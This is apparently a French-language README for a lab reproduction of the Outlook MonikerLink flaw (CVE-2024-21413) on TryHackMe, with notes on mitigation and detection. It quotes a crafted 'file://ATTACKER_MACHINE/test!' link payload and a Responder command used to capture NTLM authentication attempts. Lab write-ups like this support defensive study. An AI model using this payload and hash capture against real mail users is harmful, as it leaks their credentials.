
Ce dépôt contient des notes de recherche et une preuve de concept (PoC) de haut niveau pour CVE-2024-21413, une vulnérabilité observée dans certains clients de messagerie lors du traitement des liens de type SMB/moniker intégrés dans les messages. Le PoC et les expériences documentés ici ont été réalisés dans un environnement de laboratoire contrôlé sur des systèmes.
Ce projet reproduit le comportement MonikerLink (CVE-2024-21413) dans un environnement TryHackMe entièrement isolé afin de montrer comment certains formats de liens hypertexte peuvent amener Outlook à traiter un lien d'une manière qui divulgue des tentatives d'authentification ou mène à une exploitation plus poussée. Le livrable est une PoC, ainsi qu'un ensemble priorisé de mesures d'atténuation et de suggestions de détection que les équipes de sécurité peuvent appliquer. Aucun système en production / non autorisé n'a été ciblé.
| Outil / Compétence | Objectif |
|---|---|
| Python | Développement de scripts |
| Linux (Kali) | Système cible |
| Metasploit | Exploitation et accès |
| TryHackMe Lab | Environnement contrôlé |
Ce code a été écrit par CMNatic et peut être trouvé ici
Par exemple, dans la ligne suivante “<a href=“file://ATTACKER_MACHINE/test!” j'ai remplacé "ATTACKER_MACHINE" par l'adresse IP de ma machine attaquante, et dans la ligne “server = smtplib.SMTP('MAILSERVER', 25)”, j'ai changé "MAILSERVER" par l'adresse IP de ma machine victime.
responder -I ens5
systemctl start systemd-resolved

Cette preuve de concept expose une nuance dans la gestion des liens de Microsoft Outlook : certains liens moniker de type file:// qui référencent des ressources SMB peuvent contourner le filtrage standard d'Outlook et provoquer des tentatives d'authentification sortantes. Le comportement démontré ici a été reproduit dans un laboratoire TryHackMe entièrement contrôlé et met en évidence comment des formats de liens apparemment bénins peuvent masquer des interactions réseau. Bien que des correctifs du fournisseur et des recommandations de détection aient été publiés, la mécanique sous-jacente reste complexe en raison des utilisations légitimes du schéma moniker/file. Il est important de noter que l'activité générée par cette PoC est observable au niveau du réseau (par exemple, dans les captures de paquets montrant des tentatives d'authentification NTLM), ce qui la rend propice à l'analyse forensique et à l'investigation d'incidents.
Une règle Yara a été créée par Florian Roth pour détecter les e-mails contenant l'élément :file:\:.
